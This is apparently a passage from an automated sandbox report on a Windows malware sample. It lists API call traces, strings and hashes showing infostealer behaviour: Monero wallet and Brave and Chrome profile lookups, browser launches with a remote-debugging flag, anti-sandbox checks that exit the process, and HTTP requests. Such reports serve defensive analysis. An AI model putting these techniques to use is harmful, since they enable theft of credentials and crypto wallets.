                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00974F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: 1c9ba34f2804cbeca5b07700e1c3eea47e49eb6bea3ce95945dbbd4d4301eb49
                                        • Instruction ID: d335d2f27b1fc94b24f5dadd0b7cb2328ead35c29dd6da180ec3d38ba4347e11
                                        • Opcode Fuzzy Hash: 1c9ba34f2804cbeca5b07700e1c3eea47e49eb6bea3ce95945dbbd4d4301eb49
                                        • Instruction Fuzzy Hash: 8C12EA72910118AADB15FB90DDA2FEEB379BF95300F10419AB10672291DF786F48CB62

                                        Control-flow Graph
                                        [Rendered graph not reproduced in text: function entry at 00985760, basic blocks reach StrCmpCA and Sleep; executed/not-executed colouring and the basic-block edge list are omitted]
                                        APIs
                                          • Part of subcall function 0098AB30: lstrlen.KERNEL32(00974F55,?,?,00974F55,00990DDF), ref: 0098AB3B
                                          • Part of subcall function 0098AB30: lstrcpy.KERNEL32(00990DDF,00000000), ref: 0098AB95
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009858F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985AA7
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00985440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985478
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00985510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985568
                                          • Part of subcall function 00985510: lstrlen.KERNEL32(00000000), ref: 0098557F
                                          • Part of subcall function 00985510: StrStrA.SHLWAPI(00000000,00000000), ref: 009855B4
                                          • Part of subcall function 00985510: lstrlen.KERNEL32(00000000), ref: 009855D3
                                          • Part of subcall function 00985510: lstrlen.KERNEL32(00000000), ref: 009855FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009859DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00985B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 00985C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 6935b953f0b48b532fe66052fead6f5230023a4f7cd4be2b634d645f6fee4c82
                                        • Instruction ID: 9134443768e4958f795bb32779c59bdd3989fe9c9960deca953a0c54bd6b1c4d
                                        • Opcode Fuzzy Hash: 6935b953f0b48b532fe66052fead6f5230023a4f7cd4be2b634d645f6fee4c82
                                        • Instruction Fuzzy Hash: 2BE141729101049BDB18FBA4DDA2FED737DBFD5300F408569B50666295EF386A0CCBA2

                                        Control-flow Graph
                                        [Rendered graph not reproduced in text: function entry at 009819F0, basic blocks reach StrCmpCA and ExitProcess; executed/not-executed colouring and the basic-block edge list are omitted]
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00981A15
                                        • ExitProcess.KERNEL32 ref: 00981A21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 950c9abf7fba66cc303ee6568c990ace2bdc01f651bc3221333ec285c1899944
                                        • Instruction ID: a19ac430a39d176732bae5057258ff4a714e76c27c49200681e02deccaf9410c
                                        • Opcode Fuzzy Hash: 950c9abf7fba66cc303ee6568c990ace2bdc01f651bc3221333ec285c1899944
                                        • Instruction Fuzzy Hash: F6513778A08209EFDB14EFA4D944FAE77BDBF84704F104549E812AB384E774E942CB61

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811578), ref: 00989BF1
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018115D8), ref: 00989C0A
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018115A8), ref: 00989C22
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811710), ref: 00989C3A
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018115C0), ref: 00989C53
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01818938), ref: 00989C6B
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01805628), ref: 00989C83
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018054C8), ref: 00989C9C
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811638), ref: 00989CB4
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811608), ref: 00989CCC
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811740), ref: 00989CE5
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811650), ref: 00989CFD
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,018056A8), ref: 00989D15
                                          • Part of subcall function 00989BB0: GetProcAddress.KERNEL32(76210000,01811758), ref: 00989D2E
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 009711D0: ExitProcess.KERNEL32 ref: 00971211
                                          • Part of subcall function 00971160: GetSystemInfo.KERNEL32(?), ref: 0097116A
                                          • Part of subcall function 00971160: ExitProcess.KERNEL32 ref: 0097117E
                                          • Part of subcall function 00971110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0097112B
                                          • Part of subcall function 00971110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00971132
                                          • Part of subcall function 00971110: ExitProcess.KERNEL32 ref: 00971143
                                          • Part of subcall function 00971220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0097123E
                                          • Part of subcall function 00971220: __aulldiv.LIBCMT ref: 00971258
                                          • Part of subcall function 00971220: __aulldiv.LIBCMT ref: 00971266
                                          • Part of subcall function 00971220: ExitProcess.KERNEL32 ref: 00971294
                                          • Part of subcall function 00986A10: GetUserDefaultLangID.KERNEL32 ref: 00986A14
                                          • Part of subcall function 00971190: ExitProcess.KERNEL32 ref: 009711C6
                                          • Part of subcall function 009879E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987A10
                                          • Part of subcall function 009879E0: RtlAllocateHeap.NTDLL(00000000), ref: 00987A17
                                          • Part of subcall function 009879E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00987A2F
                                          • Part of subcall function 00987A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987AA0
                                          • Part of subcall function 00987A70: RtlAllocateHeap.NTDLL(00000000), ref: 00987AA7
                                          • Part of subcall function 00987A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00987ABF
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018188E8,?,009910F4,?,00000000,?,009910F8,?,00000000,00990AF3), ref: 00986D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00986D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00986D99
                                        • Sleep.KERNEL32(00001770), ref: 00986DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,018188E8,?,009910F4,?,00000000,?,009910F8,?,00000000,00990AF3), ref: 00986DBA
                                        • ExitProcess.KERNEL32 ref: 00986DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: 7712354ddea8c82c186d1aa27331812d92d9f3f705f9ebb54a73c4ed123bbbd2
                                        • Instruction ID: 39a7816c7c3cbb0501785367b511d96707b5dd5c875686791d4fbcf392f99ae5
                                        • Opcode Fuzzy Hash: 7712354ddea8c82c186d1aa27331812d92d9f3f705f9ebb54a73c4ed123bbbd2
                                        • Instruction Fuzzy Hash: C231E971A04208ABEB04FBF0DC57BFE7379BF94300F504959F516A6292DF786A058762

                                        Control-flow Graph
                                        [Rendered graph not reproduced in text: function entry at 00971220, basic blocks reach GlobalMemoryStatusEx and ExitProcess; executed/not-executed colouring and the basic-block edge list are omitted]
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0097123E
                                        • __aulldiv.LIBCMT ref: 00971258
                                        • __aulldiv.LIBCMT ref: 00971266
                                        • ExitProcess.KERNEL32 ref: 00971294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: 4bac285f46720f8e1ab782c2d3c44b5b0efbf8a7ef5b4599469789a1f28c16fc
                                        • Instruction ID: e7279094de3b0064ecdc1ca0020498e4e1594042cdee29e8e5b5d815cb626913
                                        • Opcode Fuzzy Hash: 4bac285f46720f8e1ab782c2d3c44b5b0efbf8a7ef5b4599469789a1f28c16fc
                                        • Instruction Fuzzy Hash: 5C016DB1D44308BBEB10EFE4CC4ABAEBB78AF54705F208448E708B62C1D77455418B59

                                        Control-flow Graph
                                        [Rendered graph not reproduced in text: function entry at 00986D5A, basic blocks reach OpenEventA, CreateEventA, CloseHandle, Sleep and ExitProcess; executed/not-executed colouring and the basic-block edge list are omitted]
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018188E8,?,009910F4,?,00000000,?,009910F8,?,00000000,00990AF3), ref: 00986D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00986D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00986D99
                                        • Sleep.KERNEL32(00001770), ref: 00986DA4
                                        • CloseHandle.KERNEL32(?,00000000,?,018188E8,?,009910F4,?,00000000,?,009910F8,?,00000000,00990AF3), ref: 00986DBA
                                        • ExitProcess.KERNEL32 ref: 00986DC2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 690f15b86e2ec073859ee7d079f19d4185eb862c7eff4f78ca111f5f132a5f1c
                                        • Instruction ID: f38b923b80b8ffb272a0f4d203c13c7f61bd828b3ebcc81ef699e1d3cd8e4eeb
                                        • Opcode Fuzzy Hash: 690f15b86e2ec073859ee7d079f19d4185eb862c7eff4f78ca111f5f132a5f1c
                                        • Instruction Fuzzy Hash: D0F01C34A48209EFEB10BBA0DC0ABBE77B8BF45742F100A15B516A93D1CBB45501DBA5

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: cc92581192b19d9fc2c3b87d01c090b1a469efd22964dcd94e201d362ee83ec8
                                        • Instruction ID: 56f47546ade7a2a8b60ad9f4e19535ee2117d9e75c1294b813381659a5a3af01
                                        • Opcode Fuzzy Hash: cc92581192b19d9fc2c3b87d01c090b1a469efd22964dcd94e201d362ee83ec8
                                        • Instruction Fuzzy Hash: F8214DB1D00209ABDF14EFA4E845BDE7B75FB45320F108625F929A72C0EB706A09CF91

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 009762D0: InternetOpenA.WININET(00990DFF,00000001,00000000,00000000,00000000), ref: 00976331
                                          • Part of subcall function 009762D0: StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00976353
                                          • Part of subcall function 009762D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00976385
                                          • Part of subcall function 009762D0: HttpOpenRequestA.WININET(00000000,GET,?,0181F008,00000000,00000000,00400100,00000000), ref: 009763D5
                                          • Part of subcall function 009762D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0097640F
                                          • Part of subcall function 009762D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00976421
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00985478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 4e18b4cb956a5926c4f63c4e29e7a5f71ae47b90bb7224535b4496cfa3ad18a0
                                        • Instruction ID: 653e8f949cb391f12667c017401a7aa09b5fa31bdc3cd2ece4f8eadad2c5f004
                                        • Opcode Fuzzy Hash: 4e18b4cb956a5926c4f63c4e29e7a5f71ae47b90bb7224535b4496cfa3ad18a0
                                        • Instruction Fuzzy Hash: 80111231900108ABDB18FFA4DD92BED7379AF90340F408559F91A57692EF38AB09CB91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987AA0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00987AA7
                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00987ABF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: 4868bfb46de1d841fc1533d1c0ddd5d0e0d206693ff49947dd7e0ba32c2cdc6f
                                        • Instruction ID: dadeda4b4c8cc35b565b9074de7253965051377a02556bed9155087ecb4cd234
                                        • Opcode Fuzzy Hash: 4868bfb46de1d841fc1533d1c0ddd5d0e0d206693ff49947dd7e0ba32c2cdc6f
                                        • Instruction Fuzzy Hash: 06016DB1A08249EBCB14DF98DD45BAEBBB8FB45711F20061AF505E2780D7B45A408BA1
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0097112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00971132
                                        • ExitProcess.KERNEL32 ref: 00971143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 512f0dbdfe34cef711013f0e86e70f8224c9b56ef6dfe81da1799daccd1a61ec
                                        • Instruction ID: deab217093abcb173149599f62321605fcc482676668ad188630629f6e159cb4
                                        • Opcode Fuzzy Hash: 512f0dbdfe34cef711013f0e86e70f8224c9b56ef6dfe81da1799daccd1a61ec
                                        • Instruction Fuzzy Hash: C8E08674A49308FBE7205BA0DC0AB0C766CAB05B01F104144F70C7A1D0C7F425404698
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009710B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009710F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree
                                        • String ID:
                                        • API String ID: 2087232378-0
                                        • Opcode ID: 5f49491513ab0f9fed753096634580c36a48041695fbd634374b0ed5cdbe398e
                                        • Instruction ID: bb06aa9bf6f262d2ddc239c9f2975ab53f01fa5bc3a49f98808344c602a4d06f
                                        • Opcode Fuzzy Hash: 5f49491513ab0f9fed753096634580c36a48041695fbd634374b0ed5cdbe398e
                                        • Instruction Fuzzy Hash: 67F082B6641218BBE7149AB8AC59FAFB79CF705B05F304948F504E7280D6719E009BA4
                                        APIs
                                          • Part of subcall function 00987A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987AA0
                                          • Part of subcall function 00987A70: RtlAllocateHeap.NTDLL(00000000), ref: 00987AA7
                                          • Part of subcall function 00987A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00987ABF
                                          • Part of subcall function 009879E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987A10
                                          • Part of subcall function 009879E0: RtlAllocateHeap.NTDLL(00000000), ref: 00987A17
                                          • Part of subcall function 009879E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00987A2F
                                        • ExitProcess.KERNEL32 ref: 009711C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: 709bdbeac3e8f636f1bcaf971d54bd19e08551ea441bdef728aa32596f2ad7d7
                                        • Instruction ID: 103e1bb5dac9f8e2fb88e9521b6287440edd3d38c8931439f1a5d6a068906531
                                        • Opcode Fuzzy Hash: 709bdbeac3e8f636f1bcaf971d54bd19e08551ea441bdef728aa32596f2ad7d7
                                        • Instruction Fuzzy Hash: 03E017AAA1830163DA1077F8BC4BB2F328C6B9634AF500814FA0986202EE26E8048375
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00990B32,00990B2F,00000000,?,?,?,00991450,00990B2E), ref: 0097BEC5
                                        • StrCmpCA.SHLWAPI(?,00991454), ref: 0097BF33
                                        • StrCmpCA.SHLWAPI(?,00991458), ref: 0097BF49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097C8A9
                                        • FindClose.KERNEL32(000000FF), ref: 0097C8BB
                                        Strings
                                        • Brave, xrefs: 0097C0E8
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0097C534
                                        • Google Chrome, xrefs: 0097C6F8
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0097C3B2
                                        • --remote-debugging-port=9229 --profile-directory=", xrefs: 0097C495
                                        • \Brave\Preferences, xrefs: 0097C1C1
                                        • Preferences, xrefs: 0097C104
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-1869280968
                                        • Opcode ID: 2453cf1e276d567c28377f9714fdd085b54feabbba653bc6f38902a31b4b41cc
                                        • Instruction ID: 5ab4dbd74337c1f2eb814feb781d97dba38079b27dfd9c4dc72a058af9e0acf4
                                        • Opcode Fuzzy Hash: 2453cf1e276d567c28377f9714fdd085b54feabbba653bc6f38902a31b4b41cc
                                        • Instruction Fuzzy Hash: BF52FF729101089BDB14FB64DD96FEE737DBF94300F404599B50AA6191EF38AB48CFA2
                                        APIs
                                        • wsprintfA.USER32 ref: 00983B1C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00983B33
                                        • lstrcat.KERNEL32(?,?), ref: 00983B85
                                        • StrCmpCA.SHLWAPI(?,00990F58), ref: 00983B97
                                        • StrCmpCA.SHLWAPI(?,00990F5C), ref: 00983BAD
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00983EB7
                                        • FindClose.KERNEL32(000000FF), ref: 00983ECC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 03f032782ab2bc5e705e72ba1ec604713c6f8881aa1aec9529500e75c4d84dbd
                                        • Instruction ID: 5a4127a57ad26363be54a08700d2f1e1afb9f0dafad0c9ac94407d3262bc6a60
                                        • Opcode Fuzzy Hash: 03f032782ab2bc5e705e72ba1ec604713c6f8881aa1aec9529500e75c4d84dbd
                                        • Instruction Fuzzy Hash: 98A122B6A002189BDB34EFA4DC85FEE737DBB95700F448588B50D96181EB749B88CF61
                                        APIs
                                        • wsprintfA.USER32 ref: 00984B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00984B93
                                        • StrCmpCA.SHLWAPI(?,00990FC4), ref: 00984BC1
                                        • StrCmpCA.SHLWAPI(?,00990FC8), ref: 00984BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00984DCD
                                        • FindClose.KERNEL32(000000FF), ref: 00984DE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 75679468e96aecc5c3cce016a40ec98ebf53cad8df310a93252737a5c3ec94d5
                                        • Instruction ID: 6549e5d71618de2463123687e083abc701ecb09af7594beec2f350970fb2d754
